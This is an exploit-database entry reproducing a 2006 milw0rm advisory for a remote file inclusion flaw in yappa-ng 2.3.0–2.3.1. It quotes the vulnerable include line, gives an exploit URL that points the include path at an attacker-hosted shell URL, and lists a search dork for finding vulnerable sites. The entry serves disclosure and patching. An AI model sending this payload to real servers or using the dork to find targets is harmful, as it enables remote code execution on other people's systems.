header-logo
Suggest Exploit
vendor:
yappa-ng
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: yappa-ng
Affected Version From: 2.3.0
Affected Version To: 2.3.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:zirkon:yappa-ng
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

yappa-ng <= v2.3.1 (admin_modules) Remote File Inclusion Exploit

A vulnerability exists in yappa-ng version 2.3.1 and 2.3.0 due to improper validation of user-supplied input in the admin_modules/admin_module_deldir.inc.php script. An attacker can exploit this vulnerability to include arbitrary remote files, leading to a complete compromise of the vulnerable system.

Mitigation:

Upgrade to the latest version of yappa-ng.
Source

Exploit-DB raw data:

#==============================================================================================
#yappa-ng <= v2.3.1 (admin_modules) Remote File Inclusion Exploit
#===============================================================================================
#                                                                         
#Critical Level : Dangerous                                               
#                                                                         
#Venedor site : http://www.zirkon.at/zirkon/scripts/yappa-ng         
#                                                                         
#Version : v2.3.1 & v2.3.0                                               
#                                                           
#================================================================================================
#Bug in : admin_modules/admin_module_deldir.inc.php
#
#Vlu Code :
#--------------------------------
#     include_once($config['path_src_include'] . "common.inc.php");
#   
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://SHELLURL.COM?
#
#Dork : "Powered by yappa-ng 2.3.1" & "Powered by yappa-ng 2.3.1"
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================

# milw0rm.com [2006-09-03]